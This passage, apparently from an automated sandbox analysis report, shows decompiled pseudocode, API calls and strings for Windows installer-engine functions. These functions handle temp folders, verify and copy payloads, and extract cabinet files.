                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLast$DirectoryFileInfoLibraryLoadSizeSystemVersion
                                                                                                                                                                  • String ID: Msi.dll$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                  • API String ID: 604185022-49624773
                                                                                                                                                                  • Opcode ID: 671b73a8d39f631f3725b8eacff8dfa9536055a6cacaff96ddba980fce7ba59f
                                                                                                                                                                  • Instruction ID: 3df29f9c1aa33baadb6d03a07f2fb82d58114b349fffdf6cc387af28fc212ff3
                                                                                                                                                                  • Opcode Fuzzy Hash: 671b73a8d39f631f3725b8eacff8dfa9536055a6cacaff96ddba980fce7ba59f
                                                                                                                                                                  • Instruction Fuzzy Hash: 8D213C72648304AEDB0ACF29FD52B293AB5E748703B1044BEE50692662E7B5DD04DB4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E054, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 127COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                                                  			E0040E054(void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v528;
				short* _v532;
				int _v536;
				char _v540;
				char _v544;
				void* __ebx;
				void* __esi;
				signed int _t29;
				long _t39;
				signed short _t54;
				intOrPtr _t67;
				intOrPtr _t68;
				long _t71;
				signed int _t73;
				signed int _t77;

				_t66 = __edi;
				_t29 =  *0x4560d0; // 0xae480e18
				_v8 = _t29 ^ _t77;
				_t57 = _a4;
				_push(0x208);
				_push(0);
				_push( &_v528);
				E004267C0(_a4, __ecx, __edi, 0, __eflags);
				_v544 = 0;
				_v532 = 0;
				_v540 = 0;
				_v536 = 0;
				if(GetTempPathW(0x104,  &_v528) != 0) {
					_t71 = E0040E205( &_v528, 0x104,  &_v540);
					__eflags = _t71;
					if(_t71 >= 0) {
						_t39 = GetCurrentProcessId();
						__imp__ProcessIdToSessionId(_t39,  &_v544, __edi);
						__eflags = _t39;
						if(_t39 == 0) {
							_t67 = _v540;
							goto L12;
						} else {
							_t71 = E00433CEA( &_v532, L"%u\\", _v544);
							__eflags = _t71;
							if(_t71 >= 0) {
								_t71 = E0040E205(_v532, 0x7fffffff,  &_v536);
								__eflags = _t71;
								if(_t71 >= 0) {
									_t68 = _v540;
									_t73 = _t68 - _v536;
									__eflags = CompareStringW(0, 0,  &(( &_v528)[_t73]), _v536, _v532, _v536) - 2;
									_t67 =  ==  ? _t73 : _t68;
									L12:
									_t71 = E00433F88(_t57,  &_v528, _t67);
									__eflags = _t71;
									if(_t71 < 0) {
										_push("Failed to copy temp folder.");
										goto L14;
									}
								} else {
									_push("Failed to get length of session id string.");
									goto L14;
								}
							} else {
								_push("Failed to format session id as a string.");
								L14:
								_push(_t71);
								E00430A57();
							}
						}
						_pop(_t66);
					} else {
						_push("Failed to get length of temp folder.");
						goto L4;
					}
				} else {
					_t54 = GetLastError();
					_t76 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
					_t71 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "logging.cpp", 0x25d, _t71);
					_push("Failed to get temp folder.");
					L4:
					_push(_t71);
					E00430A57();
				}
				if(_v532 != 0) {
					E004380AB(_v532);
				}
				return L004267AF(_t71, _v8 ^ _t77, _t66, _t71);
			}



















                                                                                                                                                                  0x0040e054
                                                                                                                                                                  0x0040e05d
                                                                                                                                                                  0x0040e064
                                                                                                                                                                  0x0040e068
                                                                                                                                                                  0x0040e06c
                                                                                                                                                                  0x0040e079
                                                                                                                                                                  0x0040e07a
                                                                                                                                                                  0x0040e07b
                                                                                                                                                                  0x0040e089
                                                                                                                                                                  0x0040e08f
                                                                                                                                                                  0x0040e095
                                                                                                                                                                  0x0040e09b
                                                                                                                                                                  0x0040e0b0
                                                                                                                                                                  0x0040e0fb
                                                                                                                                                                  0x0040e0fd
                                                                                                                                                                  0x0040e0ff
                                                                                                                                                                  0x0040e11b
                                                                                                                                                                  0x0040e122
                                                                                                                                                                  0x0040e128
                                                                                                                                                                  0x0040e12a
                                                                                                                                                                  0x0040e1b7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e130
                                                                                                                                                                  0x0040e147
                                                                                                                                                                  0x0040e14c
                                                                                                                                                                  0x0040e14e
                                                                                                                                                                  0x0040e16e
                                                                                                                                                                  0x0040e170
                                                                                                                                                                  0x0040e172
                                                                                                                                                                  0x0040e181
                                                                                                                                                                  0x0040e18f
                                                                                                                                                                  0x0040e1af
                                                                                                                                                                  0x0040e1b2
                                                                                                                                                                  0x0040e1bd
                                                                                                                                                                  0x0040e1cb
                                                                                                                                                                  0x0040e1cd
                                                                                                                                                                  0x0040e1cf
                                                                                                                                                                  0x0040e1d1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e1d1
                                                                                                                                                                  0x0040e174
                                                                                                                                                                  0x0040e174
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e174
                                                                                                                                                                  0x0040e150
                                                                                                                                                                  0x0040e150
                                                                                                                                                                  0x0040e1d6
                                                                                                                                                                  0x0040e1d6
                                                                                                                                                                  0x0040e1d7
                                                                                                                                                                  0x0040e1dd
                                                                                                                                                                  0x0040e14e
                                                                                                                                                                  0x0040e1de
                                                                                                                                                                  0x0040e101
                                                                                                                                                                  0x0040e101
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e101
                                                                                                                                                                  0x0040e0b2
                                                                                                                                                                  0x0040e0b2
                                                                                                                                                                  0x0040e0c3
                                                                                                                                                                  0x0040e0cd
                                                                                                                                                                  0x0040e0db
                                                                                                                                                                  0x0040e0e0
                                                                                                                                                                  0x0040e106
                                                                                                                                                                  0x0040e106
                                                                                                                                                                  0x0040e107
                                                                                                                                                                  0x0040e10d
                                                                                                                                                                  0x0040e1e6
                                                                                                                                                                  0x0040e1ee
                                                                                                                                                                  0x0040e1ee
                                                                                                                                                                  0x0040e202

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,00000000,0000000D), ref: 0040E0A8
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0000000D), ref: 0040E0B2
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,00000104,?,?,00000000,0000000D), ref: 0040E11B
                                                                                                                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,0000000D), ref: 0040E122
                                                                                                                                                                  Strings
                                                                                                                                                                  • logging.cpp, xrefs: 0040E0D6
                                                                                                                                                                  • Failed to format session id as a string., xrefs: 0040E150
                                                                                                                                                                  • %u\, xrefs: 0040E13C
                                                                                                                                                                  • Failed to get length of session id string., xrefs: 0040E174
                                                                                                                                                                  • Failed to get temp folder., xrefs: 0040E0E0
                                                                                                                                                                  • Failed to copy temp folder., xrefs: 0040E1D1
                                                                                                                                                                  • Failed to get length of temp folder., xrefs: 0040E101
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentErrorLastPathSessionTemp
                                                                                                                                                                  • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$logging.cpp
                                                                                                                                                                  • API String ID: 1726527325-1016737523
                                                                                                                                                                  • Opcode ID: fe347eac5391b205a21a64329b375ecf239509166f1da3d8a7edc196910f0388
                                                                                                                                                                  • Instruction ID: edc81f4efe92e158245f526fed0c72a384885faa22c09e9bad2494442a47f862
                                                                                                                                                                  • Opcode Fuzzy Hash: fe347eac5391b205a21a64329b375ecf239509166f1da3d8a7edc196910f0388
                                                                                                                                                                  • Instruction Fuzzy Hash: 2941C372D4023DAADB209B619C49BDE77B8AF14710F1106A7F908F7281DA789E418FD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00412F1F, Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 122fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 19%
                                                                                                                                                                  			E00412F1F(void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t15;
				intOrPtr _t26;
				signed short _t27;
				intOrPtr _t32;
				void* _t34;
				void* _t36;
				WCHAR* _t37;
				intOrPtr _t39;
				intOrPtr _t40;

				_t36 = __edx;
				_t37 = _a12;
				_t34 = CreateFileW(_t37, 0x80000000, 5, 0, 3, 0x8000000, 0);
				_a12 = _t34;
				if(_t34 != 0xffffffff) {
					_t15 = _a4;
					__eflags =  *((intOrPtr*)(_t15 + 0x20));
					if(__eflags == 0) {
						__eflags =  *((intOrPtr*)(_t15 + 0x1c));
						if(__eflags == 0) {
							__eflags =  *((intOrPtr*)(_t15 + 0x30));
							if(__eflags == 0) {
								goto L12;
							} else {
								_t40 = E0041296C(_t36, __eflags,  *((intOrPtr*)(_t15 + 0x30)),  *((intOrPtr*)(_t15 + 0x34)), _t37, _t34);
								__eflags = _t40;
								if(_t40 >= 0) {
									goto L12;
								} else {
									_push(_a8);
									_push("Failed to verify payload hash: %ls");
									goto L11;
								}
							}
						} else {
							_t26 = E00412B6A(_t34, _t36, __eflags, _t15, _t37, _t34);
							goto L6;
						}
					} else {
						_t26 = E004141E9(_t34, _t36, __eflags, _t15, _t37, _t34);
						L6:
						_t40 = _t26;
						__eflags = _t40;
						if(_t40 >= 0) {
							L12:
							_t39 = _a16;
							_t32 = _a8;
							_push(_t32);
							_push(_t37);
							__eflags = _t39;
							_t17 =  ==  ? L"Copying" : L"Moving";
							E00430F28(2, "%ls payload from working path \'%ls\' to path \'%ls\'",  ==  ? L"Copying" : L"Moving");
							_push(0x7d0);
							_push(3);
							_push(1);
							__eflags = _t39;
							if(_t39 == 0) {
								_push(_t32);
								_push(_t37);
								_t40 = E004367C5();
								__eflags = _t40;
								if(_t40 < 0) {
									_push(_t32);
									_push(_t37);
									_push("Failed to copy %ls to %ls");
									goto L17;
								}
							} else {
								_push(1);
								_push(_t32);
								_push(_t37);
								_t40 = E004369B5();
								__eflags = _t40;
								if(_t40 < 0) {
									_push(_t32);
									_push(_t37);
									_push("Failed to move %ls to %ls");
									L17:
									_push(_t40);
									E00430A57();
								}
							}
						} else {
							_push(_a8);
							_push("Failed to verify payload signature: %ls");
							L11:
							_push(_t40);
							E00430A57();
						}
					}
					CloseHandle(_a12);
				} else {
					_t27 = GetLastError();
					_t43 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
					_t40 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "cache.cpp", 0x4cc, _t40);
					E00430A57(_t40, "Failed to open payload in working path: %ls", _t37);
				}
				return _t40;
			}












                                                                                                                                                                  0x00412f1f
                                                                                                                                                                  0x00412f24
                                                                                                                                                                  0x00412f40
                                                                                                                                                                  0x00412f42
                                                                                                                                                                  0x00412f48
                                                                                                                                                                  0x00412f8c
                                                                                                                                                                  0x00412f8f
                                                                                                                                                                  0x00412f92
                                                                                                                                                                  0x00412f9e
                                                                                                                                                                  0x00412fa1
                                                                                                                                                                  0x00412fbb
                                                                                                                                                                  0x00412fbe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412fc0
                                                                                                                                                                  0x00412fcd
                                                                                                                                                                  0x00412fcf
                                                                                                                                                                  0x00412fd1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412fd3
                                                                                                                                                                  0x00412fd3
                                                                                                                                                                  0x00412fd6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412fd6
                                                                                                                                                                  0x00412fd1
                                                                                                                                                                  0x00412fa3
                                                                                                                                                                  0x00412fa6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412fa6
                                                                                                                                                                  0x00412f94
                                                                                                                                                                  0x00412f97
                                                                                                                                                                  0x00412fab
                                                                                                                                                                  0x00412fab
                                                                                                                                                                  0x00412fad
                                                                                                                                                                  0x00412faf
                                                                                                                                                                  0x00412fe6
                                                                                                                                                                  0x00412fe6
                                                                                                                                                                  0x00412fea
                                                                                                                                                                  0x00412fed
                                                                                                                                                                  0x00412ff3
                                                                                                                                                                  0x00412ff9
                                                                                                                                                                  0x00412ffb
                                                                                                                                                                  0x00413006
                                                                                                                                                                  0x0041300e
                                                                                                                                                                  0x00413013
                                                                                                                                                                  0x00413015
                                                                                                                                                                  0x00413017
                                                                                                                                                                  0x00413019
                                                                                                                                                                  0x00413033
                                                                                                                                                                  0x00413034
                                                                                                                                                                  0x0041303a
                                                                                                                                                                  0x0041303c
                                                                                                                                                                  0x0041303e
                                                                                                                                                                  0x00413040
                                                                                                                                                                  0x00413041
                                                                                                                                                                  0x00413042
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00413042
                                                                                                                                                                  0x0041301b
                                                                                                                                                                  0x0041301b
                                                                                                                                                                  0x0041301d
                                                                                                                                                                  0x0041301e
                                                                                                                                                                  0x00413024
                                                                                                                                                                  0x00413026
                                                                                                                                                                  0x00413028
                                                                                                                                                                  0x0041302a
                                                                                                                                                                  0x0041302b
                                                                                                                                                                  0x0041302c
                                                                                                                                                                  0x00413047
                                                                                                                                                                  0x00413047
                                                                                                                                                                  0x00413048
                                                                                                                                                                  0x0041304d
                                                                                                                                                                  0x00413028
                                                                                                                                                                  0x00412fb1
                                                                                                                                                                  0x00412fb1
                                                                                                                                                                  0x00412fb4
                                                                                                                                                                  0x00412fdb
                                                                                                                                                                  0x00412fdb
                                                                                                                                                                  0x00412fdc
                                                                                                                                                                  0x00412fe1
                                                                                                                                                                  0x00412faf
                                                                                                                                                                  0x00413054
                                                                                                                                                                  0x00412f4a
                                                                                                                                                                  0x00412f4a
                                                                                                                                                                  0x00412f5b
                                                                                                                                                                  0x00412f65
                                                                                                                                                                  0x00412f73
                                                                                                                                                                  0x00412f7f
                                                                                                                                                                  0x00412f84
                                                                                                                                                                  0x0041305f

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,00413ED8,?,00000000,?,?,0042195B), ref: 00412F3A
                                                                                                                                                                  • GetLastError.KERNEL32(?,00413ED8,?,00000000,?,?,0042195B,80000000,00000000,?,00000000,?,?,0042195B,?), ref: 00412F4A
                                                                                                                                                                  • CloseHandle.KERNEL32(?,0042195B,00000001,00000003,000007D0,?,?,0042195B,?), ref: 00413054
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls payload from working path '%ls' to path '%ls', xrefs: 00412FFF
                                                                                                                                                                  • Failed to copy %ls to %ls, xrefs: 00413042
                                                                                                                                                                  • Copying, xrefs: 00412FEE
                                                                                                                                                                  • Moving, xrefs: 00412FF4, 00412FFE
                                                                                                                                                                  • Failed to verify payload hash: %ls, xrefs: 00412FD6
                                                                                                                                                                  • Failed to verify payload signature: %ls, xrefs: 00412FB4
                                                                                                                                                                  • Failed to move %ls to %ls, xrefs: 0041302C
                                                                                                                                                                  • cache.cpp, xrefs: 00412F6E
                                                                                                                                                                  • Failed to open payload in working path: %ls, xrefs: 00412F79
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-1604654059
                                                                                                                                                                  • Opcode ID: fcabf9cac1f0a69adcaae417d8e1baa82ff4596af7f1c3e34b68d6f8015abf0e
                                                                                                                                                                  • Instruction ID: 9fbc55e016c11a6390af3b12303287f077f01eb6ce678a2460e5d860c9d8ca1e
                                                                                                                                                                  • Opcode Fuzzy Hash: fcabf9cac1f0a69adcaae417d8e1baa82ff4596af7f1c3e34b68d6f8015abf0e
                                                                                                                                                                  • Instruction Fuzzy Hash: 01313C71A40624BBEB321E168C06FAF296CDF45F64F01021BFD04FB281D7A88D5155ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004240D7, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E004240D7(void* _a4, intOrPtr _a8) {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t29;
				void* _t30;

				_t29 = _a4;
				 *(_t29 + 0x3c) =  *(_t29 + 0x3c) | 0xffffffff;
				_t5 = _t29 + 0x1c; // 0x1d
				_t30 = E00433F88(_t5, _a8, 0);
				if(_t30 >= 0) {
					_t11 = CreateEventW(0, 1, 0, 0);
					 *(_t29 + 0x24) = _t11;
					if(_t11 != 0) {
						_t12 = CreateEventW(0, 1, 0, 0);
						 *(_t29 + 0x28) = _t12;
						if(_t12 != 0) {
							_t13 = CreateThread(0, 0, E00423A9C, _t29, 0, 0);
							 *(_t29 + 0x20) = _t13;
							if(_t13 != 0) {
								_t30 = E00423E70(_t29);
								if(_t30 < 0) {
									_push("Failed to wait for operation complete.");
									goto L10;
								}
							} else {
								_t34 =  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
								_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
								E004300D9(0x80004005, "cabextract.cpp", 0x9e, _t30);
								_push("Failed to create extraction thread.");
								goto L10;
							}
						} else {
							_t37 =  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
							_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
							E004300D9(0x80004005, "cabextract.cpp", 0x9a, _t30);
							_push("Failed to create operation complete event.");
							goto L10;
						}
					} else {
						_t40 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "cabextract.cpp", 0x97, _t30);
						_push("Failed to create begin operation event.");
						goto L10;
					}
				} else {
					_push("Failed to copy file name.");
					L10:
					_push(_t30);
					E00430A57();
				}
				return _t30;
			}








                                                                                                                                                                  0x004240dd
                                                                                                                                                                  0x004240e2
                                                                                                                                                                  0x004240ea
                                                                                                                                                                  0x004240f3
                                                                                                                                                                  0x004240f7
                                                                                                                                                                  0x0042410e
                                                                                                                                                                  0x00424110
                                                                                                                                                                  0x00424115
                                                                                                                                                                  0x00424154
                                                                                                                                                                  0x00424156
                                                                                                                                                                  0x0042415b
                                                                                                                                                                  0x0042419c
                                                                                                                                                                  0x004241a2
                                                                                                                                                                  0x004241a7
                                                                                                                                                                  0x004241e4
                                                                                                                                                                  0x004241e8
                                                                                                                                                                  0x004241ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004241ea
                                                                                                                                                                  0x004241a9
                                                                                                                                                                  0x004241ba
                                                                                                                                                                  0x004241c4
                                                                                                                                                                  0x004241d2
                                                                                                                                                                  0x004241d7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004241d7
                                                                                                                                                                  0x0042415d
                                                                                                                                                                  0x0042416e
                                                                                                                                                                  0x00424178
                                                                                                                                                                  0x00424186
                                                                                                                                                                  0x0042418b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042418b
                                                                                                                                                                  0x00424117
                                                                                                                                                                  0x00424128
                                                                                                                                                                  0x00424132
                                                                                                                                                                  0x00424140
                                                                                                                                                                  0x00424145
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424145
                                                                                                                                                                  0x004240f9
                                                                                                                                                                  0x004240f9
                                                                                                                                                                  0x004241ef
                                                                                                                                                                  0x004241ef
                                                                                                                                                                  0x004241f0
                                                                                                                                                                  0x004241f6
                                                                                                                                                                  0x004241fd

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,0000001D,0040227F,00000000,00000000,00000000,00000001,?,0041909B,00000001,00000000,?,0041912F), ref: 0042410E
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041909B,00000001,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00424117
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                                                  • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp
                                                                                                                                                                  • API String ID: 545576003-1680384675
                                                                                                                                                                  • Opcode ID: f2db9b9377cdc7e081da2dea12b42795a8b0bb4e649b11cdc6b0c9d84b657450
                                                                                                                                                                  • Instruction ID: 95f889da3006b66b6fca6e38d7065ccaa2f0ad548aedf711d1d18b57789b4f06
                                                                                                                                                                  • Opcode Fuzzy Hash: f2db9b9377cdc7e081da2dea12b42795a8b0bb4e649b11cdc6b0c9d84b657450
                                                                                                                                                                  • Instruction Fuzzy Hash: AA21F132B407367AF2206A756C49B2779DCEF147A5F110227FD05F6280EA98CC1185FC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004232A4, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 102fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E004232A4(void* __ecx, CHAR* _a4) {
				void* _v8;
				long _t18;
				void* _t19;
				signed short _t22;
				void* _t27;
				signed short _t33;
				signed int _t36;
				int _t37;
				signed int _t40;
				void** _t44;
				void* _t47;
				signed short _t51;

				_push(__ecx);
				_t40 =  *0x456fa0; // 0x0
				_push(_t36);
				_t44 =  *( *((intOrPtr*)( *[fs:0x2c] + _t40 * 4)) + 4);
				_t37 = _t36 | 0xffffffff;
				_t47 = 0;
				_v8 = _t37;
				_t18 = CompareStringA(0, 0, "<the>.cab", _t37, _a4, _t37);
				if(_t18 != 2) {
					_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x8000080, 0);
					_v8 = _t19;
					__eflags = _t19 - _t37;
					if(_t19 == _t37) {
						_t22 = GetLastError();
						__eflags = _t22;
						_t51 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
						__eflags = _t51;
						_t47 =  >=  ? 0x80004005 : _t51;
						E004300D9(0x80004005, "cabextract.cpp", 0x2e0, _t47);
						E00430A57(_t47, "Failed to open cabinet file: %hs", _a4);
					}
					L8:
					_t44[0xc] = _t47;
					_t21 =  <  ? _t37 : _v8;
					return  <  ? _t37 : _v8;
				}
				_t27 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *_t44, _t27,  &_v8, 0, 0, _t18) != 0) {
					_t47 = E00423143(_t40, __eflags,  &(_t44[7]), _v8, _t44[2], _t44[3]);
					__eflags = _t47;
					if(_t47 >= 0) {
						goto L8;
					}
					_push("Failed to add virtual file pointer for cab container.");
					L5:
					_push(_t47);
					E00430A57();
					goto L8;
				}
				_t33 = GetLastError();
				_t55 =  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
				_t47 =  >=  ? 0x80004005 :  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
				E004300D9(0x80004005, "cabextract.cpp", 0x2d5, _t47);
				_push("Failed to duplicate handle to cab container.");
				goto L5;
			}















                                                                                                                                                                  0x004232a7
                                                                                                                                                                  0x004232a8
                                                                                                                                                                  0x004232b4
                                                                                                                                                                  0x004232ba
                                                                                                                                                                  0x004232c0
                                                                                                                                                                  0x004232c7
                                                                                                                                                                  0x004232d1
                                                                                                                                                                  0x004232d4
                                                                                                                                                                  0x004232dd
                                                                                                                                                                  0x0042336d
                                                                                                                                                                  0x00423373
                                                                                                                                                                  0x00423376
                                                                                                                                                                  0x00423378
                                                                                                                                                                  0x0042337a
                                                                                                                                                                  0x00423389
                                                                                                                                                                  0x0042338b
                                                                                                                                                                  0x00423393
                                                                                                                                                                  0x00423395
                                                                                                                                                                  0x004233a3
                                                                                                                                                                  0x004233b1
                                                                                                                                                                  0x004233b6
                                                                                                                                                                  0x004233b9
                                                                                                                                                                  0x004233b9
                                                                                                                                                                  0x004233c3
                                                                                                                                                                  0x004233c8
                                                                                                                                                                  0x004233c8
                                                                                                                                                                  0x004232ec
                                                                                                                                                                  0x004232fc
                                                                                                                                                                  0x00423345
                                                                                                                                                                  0x00423347
                                                                                                                                                                  0x00423349
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042334b
                                                                                                                                                                  0x00423350
                                                                                                                                                                  0x00423350
                                                                                                                                                                  0x00423351
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423357
                                                                                                                                                                  0x004232fe
                                                                                                                                                                  0x0042330f
                                                                                                                                                                  0x00423319
                                                                                                                                                                  0x00423327
                                                                                                                                                                  0x0042332c
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringA.KERNEL32(00000000,00000000,<the>.cab,?,?), ref: 004232D4
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 004232EC
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 004232F1
                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,?), ref: 004232F4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 004232FE
                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0042336D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0042337A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to duplicate handle to cab container., xrefs: 0042332C
                                                                                                                                                                  • cabextract.cpp, xrefs: 00423322, 0042339E
                                                                                                                                                                  • Failed to add virtual file pointer for cab container., xrefs: 0042334B
                                                                                                                                                                  • Failed to open cabinet file: %hs, xrefs: 004233AB
                                                                                                                                                                  • <the>.cab, xrefs: 004232CA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
